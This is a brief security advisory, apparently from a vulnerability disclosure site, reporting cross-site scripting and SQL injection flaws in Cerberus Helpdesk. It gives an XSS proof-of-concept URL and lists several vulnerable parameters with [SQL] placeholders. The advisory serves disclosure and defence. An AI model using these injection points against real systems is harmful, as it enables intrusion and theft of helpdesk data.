|
Cerberus Helpdesk Multiple Input Validation Vulnerabilities
The following cross-site scripting example was provided: http://www.example.com/support-center/index.php?mod_id=2&kb_ask=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E The following SQL injection examples were provided: http://www.example.com/cerberus-gui/knowledgebase.php?mode=view_entry&root=2&sid=c7bb6a0d5f83d61d75053c85c14af247&kbid=4 [SQL] POST: /cerberus-gui/addresses_export.php sid=c61ce82aa50569705dd774c33644446c&queues%5B%5D=[SQL]&delimiter=comma&file_type=screen&form_submit=x http://www.example.com/cerberus-gui/display_ticket_thread.php?type=comment&sid=a640d024f84be01320aacb0ec6c87d74&ticket=[SQL] |
|
|
Privacy Statement |